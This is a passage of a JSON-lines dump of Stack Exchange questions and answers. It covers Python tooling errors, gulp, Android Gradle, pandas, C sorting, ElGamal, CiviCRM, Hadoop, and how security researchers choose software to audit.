resolve_deps\n[pipenv.exceptions.ResolutionFailure]: req_dir=req_dir,\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 480, in actually_resolve_deps\n[pipenv.exceptions.ResolutionFailure]: resolved_tree = resolver.resolve()\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 395, in resolve\n[pipenv.exceptions.ResolutionFailure]: raise ResolutionFailure(message=str(e))\n[pipenv.exceptions.ResolutionFailure]: pipenv.exceptions.ResolutionFailure: ERROR: ERROR: Could not find a version that matches black\n[pipenv.exceptions.ResolutionFailure]: Skipped pre-versions: 18.3a0, 18.3a0, 18.3a1, 18.3a1, 18.3a2, 18.3a2, 18.3a3, 18.3a3, 18.3a4, 18.3a4, 18.4a0, 18.4a0, 18.4a1, 18.4a1, 18.4a2, 18.4a2, 18.4a3, 18.4a3, 18.4a4, 18.4a4, 18.5b0, 18.5b0, 18.5b1, 18.5b1, 18.6b0, 18.6b0, 18.6b1, 18.6b1, 18.6b2, 18.6b2, 18.6b3, 18.6b3, 18.6b4, 18.6b4, 18.9b0, 18.9b0, 19.3b0, 19.3b0\n[pipenv.exceptions.ResolutionFailure]: Warning: Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.\n First try clearing your dependency cache with $ pipenv lock --clear, then try the original command again.\n Alternatively, you can use $ pipenv install --skip-lock to bypass this mechanism, then run $ pipenv graph to inspect the situation.\n Hint: try $ pipenv lock --pre if it is a pre-release dependency.\nERROR: ERROR: Could not find a version that matches black\nSkipped pre-versions: 18.3a0, 18.3a0, 18.3a1, 18.3a1, 18.3a2, 18.3a2, 18.3a3, 18.3a3, 18.3a4, 18.3a4, 18.4a0, 18.4a0, 18.4a1, 18.4a1, 18.4a2, 18.4a2, 18.4a3, 18.4a3, 18.4a4, 18.4a4, 18.5b0, 18.5b0, 18.5b1, 18.5b1, 18.6b0, 18.6b0, 18.6b1, 18.6b1, 18.6b2, 18.6b2, 18.6b3, 18.6b3, 18.6b4, 18.6b4, 18.9b0, 18.9b0, 19.3b0, 19.3b0\nThere are incompatible versions in the resolved dependencies.\n[pipenv.exceptions.ResolutionFailure]: req_dir=requirements_dir\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 726, in resolve_deps\n[pipenv.exceptions.ResolutionFailure]: req_dir=req_dir,\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 480, in actually_resolve_deps\n[pipenv.exceptions.ResolutionFailure]: resolved_tree = resolver.resolve()\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 395, in resolve\n[pipenv.exceptions.ResolutionFailure]: raise ResolutionFailure(message=str(e))\n[pipenv.exceptions.ResolutionFailure]: pipenv.exceptions.ResolutionFailure: ERROR: ERROR: Could not find a version that matches black\n[pipenv.exceptions.ResolutionFailure]: Skipped pre-versions: 18.3a0, 18.3a0, 18.3a1, 18.3a1, 18.3a2, 18.3a2, 18.3a3, 18.3a3, 18.3a4, 18.3a4, 18.4a0, 18.4a0, 18.4a1, 18.4a1, 18.4a2, 18.4a2, 18.4a3, 18.4a3, 18.4a4, 18.4a4, 18.5b0, 18.5b0, 18.5b1, 18.5b1, 18.6b0, 18.6b0, 18.6b1, 18.6b1, 18.6b2, 18.6b2, 18.6b3, 18.6b3, 18.6b4, 18.6b4, 18.9b0, 18.9b0, 19.3b0, 19.3b0\n[pipenv.exceptions.ResolutionFailure]: Warning: Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.\n First try clearing your dependency cache with $ pipenv lock --clear, then try the original command again.\n Alternatively, you can use $ pipenv install --skip-lock to bypass this mechanism, then run $ pipenv graph to inspect the situation.\n Hint: try $ pipenv lock --pre if it is a pre-release dependency.\nERROR: ERROR: Could not find a version that matches black\nSkipped pre-versions: 18.3a0, 18.3a0, 18.3a1, 18.3a1, 18.3a2, 18.3a2, 18.3a3, 18.3a3, 18.3a4, 18.3a4, 18.4a0, 18.4a0, 18.4a1, 18.4a1, 18.4a2, 18.4a2, 18.4a3, 18.4a3, 18.4a4, 18.4a4, 18.5b0, 18.5b0, 18.5b1, 18.5b1, 18.6b0, 18.6b0, 18.6b1, 18.6b1, 18.6b2, 18.6b2, 18.6b3, 18.6b3, 18.6b4, 18.6b4, 18.9b0, 18.9b0, 19.3b0, 19.3b0\nThere are incompatible versions in the resolved dependencies.\n<\/code>\nComment: pipenv uninstall black, pipenv clean, pipenv lock --clear, pipenv install black==19.10b0 (or whatever current version there is at the time you read this). Worked for me.\nAnswer: This works for me:\nI think part of the secret sauce is to disable certain pylint warnings which conflict with black (\"disable = ...\")\nAdd the file .pylintrc in root:\n<code># Looks like setup.cfg cannot load the extensions in the precommit,\n# but that the pylintrc file can\n# This happens even when specifying --rcfile=setup.cfg\n# Possible bug from pylint?\n[MASTER]\nload-plugins = pylint.extensions.docparams, pylint.extensions.docstyle, pylint.extensions.mccabe\n\n[BASIC]\naccept-no-param-doc = no\naccept-no-raise-doc = no\naccept-no-return-doc = no\naccept-no-yields-doc = no\ndefault-docstring-type = numpy\n\n[FORMAT]\nmax-line-length = 88\n\n[MESSAGES CONTROL]\ndisable = C0330, C0326, C0199, C0411\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to get pylint and black working together in VSCode?","dup_signals":{}},"subset":"stackexchange"} +{"text":"add a uibarbutton for ZBarReaderViewController\n\nQuestion: I am working on ZBarReader and What I am having so far right now is \n<code>ZBarReaderViewController *controller = [[ZBarReaderViewController alloc] init];\ncontroller.navigationController.navigationBarHidden = NO;\n\/\/ Add Edit button to the right and handle click event UIBarButtonItem *manualButton = [[UIBarButtonItem alloc] initWithTitle:@\"Manual\" style:UIBarButtonItemStyleBordered target:self action:@selector(EditMode:)];\n[controller.navigationItem setRightBarButtonItem:manualButton];\ncontroller.readerDelegate = self;\n[self presentModalViewController:controller animated:YES];\n<\/code>\nMy question is that can we so such things above : set toolbar visible and add button on it for ZBarReaderViewController.\nAnswer: Yes, you have set some property first to your ZBarReaderViewController\n<code> self.zReader.showsCameraControls = NO;\n self.zReader.showsZBarControls=NO;\n<\/code>\nThen you have to set your custom <code>cameraOverlayView<\/code>, for example this set a <code>UIToolBar<\/code> with a left button to dismiss the picker and a <code>UISwitch<\/code> to control the flashMode:\n<code> self.zReader.cameraOverlayView=[self setOverlayPickerView];\n\n- (UIView *)setOverlayPickerView{\n UIView *v=[[UIView alloc] initWithFrame:CGRectMake(0, 0, 320, 480)];\n [v setBackgroundColor:[UIColor clearColor]];\n UIToolbar *myToolBar = [[UIToolbar alloc] init];\n UIBarButtonItem *backButton=[[UIBarButtonItem alloc] initWithTitle:@\"back\" style:UIBarButtonItemStyleBordered target:self action:@selector(dismissOverlayView:)];\n UISwitch *sw=[[UISwitch alloc] init];\n [sw setOn:NO];\n UIBarButtonItem *switchButton=[[UIBarButtonItem alloc] initWithCustomView:sw];\n UIBarButtonItem *fixed=[[UIBarButtonItem alloc] initWithBarButtonSystemItem:UIBarButtonSystemItemFlexibleSpace target:nil action:nil]; \n [sw addTarget:self action:@selector(handleSwitchFlash:) forControlEvents:UIControlEventValueChanged];\n [myToolBar setItems:[NSArray arrayWithObjects:backButton,fixed,switchButton,nil]];\n [myToolBar setBarStyle:UIBarStyleDefault];\n CGRect toolBarFrame;\n toolBarFrame = CGRectMake(0, 436, 320, 44);\n [myToolBar setFrame:toolBarFrame];\n [v addSubview:myToolBar];\n return v;\n}\n\n- (void)dismissOverlayView:(id)sender{ \n [self dismissModalViewControllerAnimated: YES];\n}\n<\/code>\nComment: it does helps me. I tried and it worked. You know how can we load a view from nib instead of programming it ?\nComment: You can just create a normal UIViewController (with a xib) and pass its view to `cameraOverlayView`.\nComment: I have just gave it a try.. Please take a look at another post by me at [link](http:\/\/stackoverflow.com\/questions\/10156930\/customization-of-the-camera-overlay)\nComment: @ttran see my response in your other question (..and accept the answer if its useful for you:))\nAnswer: Besides @Mat answer, \nshould add \n<code>[self.zReader.view setFrame:[UIScreen mainScreen].bounds];<\/code> \nbefore \n<code>self.zReader.cameraOverlayView=[self setOverlayPickerView];<\/code> \nBecause, by default, the size of self.zReader is (320, 480).\nBy the way, if no need compatible iOS6.0, you can just use [AVCaptureDevice]: https:\/\/developer.apple.com\/library\/mac\/documentation\/AVFoundation\/Reference\/AVCaptureDevice_Class\/Reference\/Reference.html\n","meta":{"source":"stackoverflow","title":"add a uibarbutton for ZBarReaderViewController","dup_signals":{}},"subset":"stackexchange"} +{"text":"Looking for way to copy files in gulp and rename based on parent directory\n\nQuestion: For each module I have some files that need to be copied over to the build directory, and am looking for a way to minimize the repeated code from this: \n<code>gulp.src('.\/client\/src\/modules\/signup\/index.js')\n .pipe(gulp.dest('.\/build\/public\/js\/signup'));\n\ngulp.src('.\/client\/src\/modules\/admin\/index.js')\n .pipe(gulp.dest('.\/build\/public\/js\/admin'));\n<\/code>\nto something like this:\n<code>gulp.src('.\/client\/src\/modules\/(.*)\/index.js')\n .pipe(gulp.dest('.\/build\/public\/js\/$1'));\n<\/code>\nObviously the above doesn't work, so is there a way to do this, or an npm that already does this?\nThanks\nAnswer: Not the answer, but applicable to this question's appearance in search results.\nTo copy files\/folders in gulp\n<code>gulp.task('copy', () => gulp\n .src('index.js')\n .pipe(gulp.dest('dist'))\n);\n<\/code>\nComment: @jinglesthula It's a useful service to those who arrive at this question via search engines, regardless of how well the search engine is doing its job. I appreciate it.\nComment: You've got to return the stream to let Gulp know when the task finishes.\nComment: I'm confused why an answer that says \"not the answer\" has more upvotes than the accepted answer that does answer the question. I'm not sure we should clutter SO with answers designed to make search engines do some particular thing as opposed to providing answers to the question. I think it's search engines' jobs to make something useful of what they get when they crawl the site. Just my $0.02\nComment: Hmmm... my gulp says this task completes, but the output file does not exist.\nComment: haha just realized this is more popular than the right question or right answer :P\nAnswer: The best way is to configure your <code>base<\/code> when sourcing files, like so:\n<code>gulp.src('.\/client\/src\/modules\/**\/index.js', {base: '.\/client\/src\/modules'})\n .pipe(gulp.dest('.\/build\/public\/js\/'));\n<\/code>\nThis tells <code>gulp<\/code> to use the modules directory as the starting point for determining relative paths.\n(Also, you can use <code>\/**\/*.js<\/code> if you want to include all JS files...)\nComment: There must be a more dynamic way of doing this - what about when src files come from 2 different directories and you want to preserve their directories in dest?\nComment: @IvanDurst I managed this specific case with the OP (answer) code. using the base config **and** using the relative path from the gulp file to independent files and `.\/folder-example\/**` full folders and files.\nAnswer: <code>return gulp.src('.\/client\/src\/modules\/(.*)\/index.js') \n .pipe(gulp.dest('.\/build\/public\/js\/$1'));\n<\/code>\nWorked for me !\nComment: ...so can someone rewrite it so it _does_ work as is, so people coming to this page looking for that exact snippet of code can actually use it?\nComment: .. even still, this *is* the answer.\nComment: So... are parens and $n \"backreferences\" allowed in src\/dest globs? They aren't regexes, afaik. This looks like what I'm looking for but the vinyl-fs docs are rather terse on the .src() and .dest() options and what's allowed in them and how they work.\nAnswer: Use for preserve input directory tree will be preserved. \n<code>.pipe(gulp.dest(function(file) {\n var src = path.resolve(SRC_FOLDER);\n var final_dist = file.base.replace(src, '');\n return DIST_FOLDER + final_dist;\n}))\n<\/code>\nUsing this, you can put in the src: <code>.src(SRC_FOLDER + '\/**\/*.js')<\/code>.\nThe others answers not worked for me (like using <code>base:<\/code> on <code>src()<\/code>}, because some plugins flatten the directory tree.\nAnswer: copy files in parallel\n<code>gulp.task('copy', gulp.parallel(\n() => gulp.src('*.json').pipe(gulp.dest('build\/')),\n() => gulp.src('*.ico').pipe(gulp.dest('build\/')),\n() => gulp.src('img\/**\/*').pipe(gulp.dest('build\/img\/')),\n)\n);\n<\/code>\n","meta":{"source":"stackoverflow","title":"Looking for way to copy files in gulp and rename based on parent directory","dup_signals":{}},"subset":"stackexchange"} +{"text":"udp sendto lasting too long (unusual times)\n\nQuestion: In my application I'm sending data via an UDP socket with a rate of around 58MB\/second. Most of the times it works fine however some time the sendto last too long and the time are grouped around 0.1, 0.2, 0.3 seconds (see immage below).\nMy system is a linux system with kernel 2.6.32-24-server, the buffer for each send is 45000 bytes long. Do you have a clue on why sometime this happens?\nComment: have you tried it with an RT kernel?\nAnswer: From send(2):\n<code>When the message does not fit into the send buffer of the socket,\n send() normally blocks, unless the socket has been placed in nonblock\u2010\n ing I\/O mode. In nonblocking mode it would fail with the error EAGAIN\n or EWOULDBLOCK in this case. The select(2) call may be used to deter\u2010\n mine when it is possible to send more data.<\/code>\nOther than this the kernel might be doing something else in the meantime. If this is the case, using an RT kernel might help as suggested by yi_H.\nComment: What is strange to me is why the 0.1, 0.2, 0.3 and so on\nComment: Also a tenth second is a terrible long time for networking... how do you send the data? Is it sent evenly or in bursts? Could the send buffer get full? 100Mb\/1Gb\/.. card?\nComment: It's evenly, we have 1Gb card, we have upgraded to 2.6.38-10 that is thick less (the previous one 2.6.32-24 was not) and now we are not able to replicate the problem.\n","meta":{"source":"stackoverflow","title":"udp sendto lasting too long (unusual times)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Storing a non-specific date (eg. \"Fall 1997\") in a relational database\n\nQuestion: I am parsing a text document and converting much of the data into a relational format. A variety of date formats are used throughout, but one of these is \"Fall 1997\".\nWhat would be the best way to go about storing this information, which is non-specific in one sense (not an absolute date), without losing the granularity that \"fall\" does provide?\nAs additional info: my specific database is MySQL.\nComment: Do you need to be able to sort the result, such that a specific date in the summer of 1997 will sort right before the \"Fall 1997\" date?\nAnswer: There are various techniques I've seen, but without loading it in straight varchar, you'll have to decide on the scope. You can use a regular date column containing 1997-09-01 but augment it with a column which indicates the specificity - 'S' for season (using the firsts of months 3, 6, 9, 12) 'Q' for quarter (using the firsts of months 1, 4, 7, 10) or whatever. Similarly for semesters and things like that.\nWhen interpreting such dates - particularly in \"did this event happen before or after a certain time\", you have to decide how to handle them. Like whether the whole period has to come before a date.\nYou can convert such a \"date\" to an entry in a period table with a description and a start and end date and then link to the period. Then Fall 1997 is a database entity in the sense that it is well defined as a row in a table and other rows have foreign keys to it. This does not remove the need for logic to decide things about these dates, but it does mean that such logic can be table driven.\nIt would depend a lot more on the usage scenarios and the variety of data before I would make a call.\n","meta":{"source":"stackoverflow","title":"Storing a non-specific date (eg. \"Fall 1997\") in a relational database","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to sort a pandas dataframe column by item type?\n\nQuestion: I have the following column in my Dataframe:\n<code>import pandas as pd\nx = pd. Series(['R1', 'R2', 70, -100, 0, -25, 'R7', 'R8'])\ndf = pd.DataFrame(x)\n<\/code>\nI want to sort the column such that the output is:\n<code>['R1', 'R2', 'R7', 'R8', 70, -100, 0, -25]\n<\/code>\nHow can I solve it?\nComment: How is 70< -100? why is 0 < -25? What's the sorting logic?\nComment: Why don't you just sort the dataframe while creating it? So just use `df = pd.DataFrame(pd.Series(['R1', 'R2', 'R7', 'R8', 70, -100, 0, -25]))`\nComment: Please explain your sorting logic\nComment: my sorting logic is to just group it according to the type without changing the sequence.\nComment: I cannot do the sort it while creating because Im not creating it myself, it is derived from other data. Just for the sake of this qestion, I created it here.\nAnswer: I'm giving this with example to handle the 2 <code>types<\/code> which you have mentioned in your question :\n<code>import pandas as pd\ndf = pd.DataFrame()\n\ndf['random_vals'] = pd.Series(['R1', 'R2', 70, -100, 0, -25, 'R7', 'R8'])\n\ndef sort_by_type(random_types_list):\n str_list = []\n int_list = []\n for elem in random_types_list:\n if isinstance(elem, str):\n str_list.append(elem)\n elif isinstance(elem, int):\n int_list.append(elem)\n return str_list+int_list\n\nprint(sort_by_type(list(df['random_vals'])))\n<\/code>\nOutput of the <code>print<\/code> statement :\n<code>>>> print(sort_by_type(list(df['random_vals'])))\n['R1', 'R2', 'R7', 'R8', 70, -100, 0, -25]\n<\/code>\n\nSimilarly you can add the code in <code>sort_by_types<\/code> method for other <code>data-types<\/code> aswell. \nComment: Thank you very much Mr. Sowanja! I liked that approach, but all the other columns of the data frame won't change along with it. Is there any way to shuffle all columns with this column?\nComment: will try that out\n","meta":{"source":"stackoverflow","title":"How to sort a pandas dataframe column by item type?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Failed to resolve: com.android.support:design:25.0.1\n\nQuestion: Failed to resolve: com.android.support:design:25.0.1\nERROR- this support library should not use a different verion(25) than the compileSdkVersion(28) \n<code> dependencies {\n implementation fileTree(dir: 'libs', include: ['*.jar'])\n implementation 'com.android.support:appcompat-v7:28.0.0-beta01'\n implementation 'com.android.support.constraint:constraint- layout:1.1.2'\n testImplementation 'junit:junit:4.12'\n androidTestImplementation 'com.android.support.test:runner:1.0.2'\n androidTestImplementation 'com.android.support.test.espresso:espresso- \n core:3.0.2'\n\n \/\/add library\n compile 'com.android.support:design:25.0.1'\n compile 'com.firebaseui:firebase-ui:0.6.2'\n}\n<\/code>\nComment: try `compile 'com.android.support:design:28.0.0-beta01'`\nComment: I did, this is showing now: Manifest merger failed : uses-sdk:minSdkVersion 15 cannot be smaller than version 16 declared in library [com.firebaseui:firebase-ui:0.6.2] C:\\Users\\h\\.gradle\\caches\\transforms-1\\files-1.1\\firebase-ui-0.6.2.aar\\84f7ed608b610d3a6c07ea2571ca66a0\\AndroidManifest.xml as the library might be using APIs not available in 15\nComment: this suggestion is showing - Suggestion: use a compatible library with a minSdk of at most 15,\n or increase this project's minSdk version to at least 16,\n or use tools:overrideLibrary=\"com.firebase.ui\" to force usage (may lead to runtime failures)\nComment: change `minSdkVersion 16` in build.gradle\nAnswer: Libraries from same \"group\" or referencing each others, must use the same version (when possible). Support llibraries, in particular, must have the same version of your compiled one.\nYou have <code>implementation 'com.android.support:appcompat-v7:28.0.0-beta01'<\/code> that is targeting a <code>28 Beta version<\/code> and <code>compile 'com.android.support:design:25.0.1'<\/code> targeting <code>25 version<\/code>.\nAlso you are probably using <code>compileSdkVersion 28<\/code>.\nImplement support:design library to refer to version <code>28.0.0-beta01<\/code> too and it will (probably) will be fixed.\nin shorts, use this gradle snippet:\n<code>implementation fileTree(dir: 'libs', include: ['*.jar'])\nimplementation 'com.android.support:appcompat-v7:28.0.0-beta01'\nimplementation 'com.android.support.constraint:constraint- layout:1.1.2'\ntestImplementation 'junit:junit:4.12'\nandroidTestImplementation 'com.android.support.test:runner:1.0.2'\nandroidTestImplementation 'com.android.support.test.espresso:espresso-core:3.0.2'\n\n\/\/add library\nimplementation 'com.android.support:design:28.0.0-beta01'\nimplementation 'com.firebaseui:firebase-ui:0.6.2'\n<\/code>\n(use <code>implementation<\/code> instead of <code>compile<\/code> since it will be replaced soon)\nHope this helps. Let me know if this solved!\nEdit from comment below\nWhy are you using old versions? is there a reason?\nincrease firebase version also, the last should be 4.1\n<code>implementation 'com.firebaseui:firebase-ui-database:4.1.0'\n<\/code>\nComment: I did the same but after syncing this shows: Manifest merger failed : uses-sdk:minSdkVersion 15 cannot be smaller than version 16 declared in library [com.firebaseui:firebase-ui:0.6.2] C:\\Users\\hp\\.gradle\\caches\\transforms-1\\files-1.1\\firebase-ui-0.6.2.aar\\84f7ed608b610d3a6c07ea2571ca66a0\\AndroidManifest.xml as the library might be using APIs not available in 15\n Suggestion: use a compatible library with a minSdk of at most 15,\n or increase this project's minSdk version to at least 16,\n or use tools:overrideLibrary=\"com.firebase.ui\" to force usage (may lead to runtime failures)\nComment: Manifest merger failed : uses-sdk:minSdkVersion 15 cannot be smaller than version 16 declared in library [com.firebaseui:firebase-ui-database:4.1.0] C:\\Users\\hp\\.gradle\\caches\\transforms-1\\files-1.1\\firebase-ui-database-4.1.0.aar\\35f2453636c0d9c1cf2fc620ff9a897d\\AndroidManifest.xml as the library might be using APIs not available in 15\n Suggestion: use a compatible library with a minSdk of at most 15,\n or increase this project's minSdk version to at least 16,\n or use tools:overrideLibrary=\"com.firebase.ui.database\" to force usage (may lead to runtime failures)\nComment: @BTSJimin no problem, consider marking the answer as the solution to help other people with the same problem :)\nAnswer: Replace \n<code>compile 'com.android.support:design:25.0.1'\n<\/code>\nwith \n<code>compile 'com.android.support:design:28.0.0'\n<\/code>\n","meta":{"source":"stackoverflow","title":"Failed to resolve: com.android.support:design:25.0.1","dup_signals":{}},"subset":"stackexchange"} +{"text":"Insertion sort runtime error\n\nQuestion: I created a basic array and tried to sort it using an insertion sort but I get these errors as I run the program. There are no errors after compiling\n\n.\/insertionsort.c: line 3: $'\\r': command not found\n.\/insertionsort.c: line 4: syntax error near unexpected token `('\n'\/insertionsort.c: line 4: `void sort(int *array, int n);\n\nDoes anyone have any ideas how to fix this?\n<code>#include <stdio.h>\n#include <stdlib.h>\n\nvoid sort(int *array, int n);\nvoid swap(int array1, int array2);\n\nvoid main()\n{\n int arr[] = {1, 5, 3, 5, 4, 3, 2, 7, 4, 9, 6};\n int n = sizeof(arr);\n\n sort(arr, n);\n}\n\nvoid sort(int *array, int n)\n{\n int i, j;\n\n printf(\"Array before sorting: \");\n for (i=0; i<n; i++)\n printf(\"%d \", &array[i]);\n\n for (i=1; i<n; i++)\n {\n for (j=i; j>0; j--)\n {\n if (array[j-1] > array[j])\n swap(array[j], array[j-1]);\n }\n }\n\n printf(\"Array after sorting: \");\n for (i=0; i<n; i++)\n printf(\"%d \", &array[i]);\n}\n\nvoid swap(int array1, int array2)\n{\n int temp;\n temp = array1;\n array1 = array2;\n array2 = temp;\n}\n<\/code>\nComment: Well, then, I think you can just use `gcc -o main main.c` where `main.c` would be the source file containing the code from above. And then just type `.\/main` to run you program. I'm not seeing where the problem could be, but maybe I'm missing something. Could you please try that? Or are you using another method to builld\/run your application?!\nComment: How are you compiling your source file? How are you running it? Are you on Linux or Windows? Are you using an IDE or the command line?\nComment: I'm on windows and I'm using the cygwin terminal\nComment: i didn't have gcc but i had g++, thanks!\nComment: So...did it work with no errors then?\nComment: Yes, got rid of all of them\nComment: Great, happy hacking then..and don't forget to [accept an answer](https:\/\/meta.stackexchange.com\/questions\/5234\/how-does-accepting-an-answer-work)\nAnswer: I think you might want to do\n<code>int n = sizeof(arr) \/ sizeof(int);\n<\/code>\nas <code>sizeof(arr)<\/code> would give you the total number of bytes needed by your array.\nAlso, you're printing pointers. So you can remove the <code>&<\/code> in your print statements:\n<code>printf(\"%d \", array[i]);\n<\/code>\nLastly, you're passing by value to your <code>swap<\/code> function. So the original array will not be modified. You might want a signature like this:\n<code>void swap(int *array1, int *array2);\n<\/code>\nI don't get any error running your program, only warnings for your <code>printf<\/code>, the reason being the one mentioned above. You should compile\/run your program something like this: <code>gcc -o main main.c<\/code> where <code>main.c<\/code> would be the source file containing the code from above. And then just type <code>.\/main<\/code>.\nComment: how can I fix the problem of passing by value to my swap function? I tried adding an asterix before array1 and array2 in the swap function but i just get more errors\nComment: @Michael, you must also change the call of your `swap` in the `sort` function. Hint: it has something to do with pointers.\nComment: thank you for the help, I can't figure out the swap function (it's late), so I just took it out and put the contents of it right in my if statement. Works perfect now\nAnswer: From the program name <code>.\/insertionsort.c<\/code> in your error message, I guess you are trying to execute your source code directly, which isn't normal procedure.\nI think you should type the name of your compiled binary file instead your source code to your terminal to run the program.\nComment: That would be interesting. But would the `.c` file be executable by default?! Shouldn't he get a `permission denied` instead? I'm guessing he didn't just `chmod +x insertionsort.c` by mistake.\nComment: @Mihai This execution is performed on Windows, on which such `chmod` isn't required to execute files.\n","meta":{"source":"stackoverflow","title":"Insertion sort runtime error","dup_signals":{}},"subset":"stackexchange"} +{"text":"Semi static ElGamal vulnerability when the secret is not truely random\n\nQuestion: Assume Alice wants to communicate with Bob. Bob provides his public parameters $(g,n,y)$ with $y=g^x$ where $x$ is his secret key\nNow Alice wants to send $m$ to Bob. She generates a random $r$ and computes $u = g^r$ and $c=my^r$ and sends back to Bob $(u,c)$.\nYou intercept $(g,n,y)$ and $(u,c)$ and you also know what $m$ is. \nAs far as I know, it is still not possible to recover $r$ from this. \nBut what happens if Alice sends a second message $(u',c')$ with $u' = g^{r'} = g^{f(r)}$, in other words $r'$ can be easily computed from $r$.\nCan you recover $m'$ and\/or even $r$ ?\nAnswer: The answer obviously depends on what $f$ is. However, we can say a few general things.\nIf $f$ is a \"simple\" linear function (e.g. $f(r) = kr$ for most constant $k$), you can recover $m'$ easily. You cannot recover $r$ or $r'$.\nIf $f$ is a more complex function that is bijective or nearly bijective (say SHA-256), then you probably cannot recover $m'$. You cannot recover $r$ or $r'$.\nIf $f$ is a sufficiently many-to-one function and its inverse image is sufficiently simple (say $f(r) = r \\bmod{2^i}$ for a suitable $i$), you may be able to recover $r$ and $r'$.\n","meta":{"source":"crypto.stackexchange","title":"Semi static ElGamal vulnerability when the secret is not truely random","dup_signals":{}},"subset":"stackexchange"} +{"text":"Security Researchers: How do you choose what services or software you are going to audit next?\n\nQuestion: Security Researchers: How do you choose what services or software you are going to audit next?\nI am referring to finding vulnerabilities and developing exploits in various applications. I am wandering how decide what software you will target next? \nComment: +3 for this awesome question! A simple +1 won't cut it.\nAnswer: I audit a lot of code, I write exploits, and I have accumulated more than 50 CVE's over the course of about 6 years of bug hunting. \nWhen I went on my first serious bug hunt I was looking for weak projects that had not be extensively audited by the community(or milw0rm back in the day). To do this I used SourceForge's Advanced Search, which has changed a lot. Basically I was looking for a PHP project that people where downloading and using, but wasn't very popular. Lets say around ~1,000 downloads and less than 1 year old. I found Ultimate PHP Board which turned out to be very insecure. \nAs time progressed I got bored with insecure projects so I changed my tactics entirely and started going after popular projects. For example I exploit PHPMyAdmin which is the most downloaded PHP application.\nAfter years of penetration testing and application development you get a kind of 6th sense into how the code works and where the problem areas can be. You can look at a piece of functionality and write an implementation in your head and pick out where things could go wrong. So on a penetration test I always ask my self the same question: \"What is the worst that could happen?\". And then go out and focus my testing based on this question.\nI'll give you a good example. I saw an advertizement for Canonical Landscape (Maker of Ubuntu). In the ad it showed a feature of Landscape where you could execute a command on every machine you own as root. I thought to my self, \"What if it was vulnerable to CSRF?\". I signed up for a free trail, and sure enough, you could gain remote root on every machine using a single forged HTTP request. Outch! (I also got remote root on cPanel with CSRF, and I earned a severity metric :)\nAnother flaw I found in Google Music, I uploaded an MP3 that had JavaScript in all of the ID3 tags. Sure enough the artist and album names where being printed to the page, and I got $500 from the bug bounty program with my very first test. One of the reasons why I chose this input is because i knew it wouldn't be exercised by a dumb vulnerability scanner. Its as if I knew it would fail ahead of time. That kind of innate understanding only comes with years of practice. \nComment: Link http:\/\/www.exploit-db.com\/author\/1\/?a=628 is no longer accessible. Returns 404.\nComment: @kinunt http:\/\/www.exploit-db.com\/author\/?a=628 ?\nAnswer: By scanning the internet, the Nmap team has elaborated a list of the most commonly exposed TCP and UDP services. You can make use of this list in order to determine the next service you will be auditing next, assuming that you want to target the most commonly used ones.\n","meta":{"source":"security.stackexchange","title":"Security Researchers: How do you choose what services or software you are going to audit next?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to set read only field in Drupal CiviCRM\n\nQuestion: I would like to set a read only field in Drupal CiviCRM:\n<code>mymodule_civicrm_buildForm($formName, &$form) {\n ...\n\n \/\/ Set default value\n $defaults['readonly_field'] = xxx;\n $form->setDefaults($defaults);\n\n \/\/ Set read only\n $element = $form->getElement('event_type_id');\n $element->updateAttributes(array('disabled'=>true));\n}\n<\/code>\nThe field is disabled for input; however, the default value cannot be passed through the form submission.\nThe form warns that this required field does not input.\nCould you advise how to set the read only field correctly?\nThanks a lot!!\nAnswer: Try <code>$element->updateAttributes(array('readonly'=>true));<\/code>\nThe difference between readonly and disabled is a common thing with HTML and forms.\nSee for example https:\/\/stackoverflow.com\/questions\/7730695\/whats-the-difference-between-disabled-disabled-and-readonly-readonly-for-ht\n","meta":{"source":"civicrm.stackexchange","title":"How to set read only field in Drupal CiviCRM","dup_signals":{}},"subset":"stackexchange"} +{"text":"Hadoop - IntWritable(int) constructor not loaded\n\nQuestion: I'm trying to make a MapReduce in Hadoop, and want to convert a String to an IntWritable for it. I'm following the advice listed here: How to convert String object to IntWritable Object in Hadoop.\nIt advises to use \n<code>new IntWriteable(Integer.parseInt(someString))\n<\/code>\nso what I am trying is \n<code>public class MyMapper extends Mapper<LongWritable, Text, Text, IntWritable > {\nprivate final Text wordKey = new Text(\"\");\n\npublic void map(LongWritable ikey, Text value, Context context) throws IOException, InterruptedException {\n String[] friend = value.toString().split(\";\");\n String[] friendswith = friend[1].split(\",\");\n for (String s : friendswith) {\n wordKey.set(friend[0]);\n context.write(wordKey, IntWritable(Integer.parseInt(s))); \/\/trying to convert here\n }\n }\n}\n<\/code>\nbut get the error \n<code>The method IntWritable(int) is undefined for the type MyMapper\n<\/code>\nAccording to the documentation here it notes, that there is a contructor that accepts an <code>int<\/code> as an input. I do have <code>IntWritable<\/code> imported:\n<code>import org.apache.hadoop.io.IntWritable;\n<\/code>\nWhat might cause that I cannot use the <code>IntWritable(int)<\/code> constructor?\nComment: You are missing `new` keyword between `context.write(wordKey` and `IntWritable(Integer.parseInt(s)))`\nAnswer: Yout are missing the <code>new<\/code> keyword.\nIn the line\n<code>context.write(wordKey, IntWritable(Integer.parseInt(s)));\n<\/code>\nyou are not creating an instance of <code>IntWritable<\/code>, instead you are trying to call a method named <code>IntWritable<\/code> which is not defined.\nTry this:\n<code>context.write(wordKey, new IntWritable(Integer.parseInt(s)));\n<\/code>\nComment: Oh. Right. Thank you! :)\n","meta":{"source":"stackoverflow","title":"Hadoop - IntWritable(int) constructor not loaded","dup_signals":{}},"subset":"stackexchange"} +{"text":"Create ID for specific sequence of consecutive days based on grouping variable in R\n\nQuestion: For a list of events at the country-day 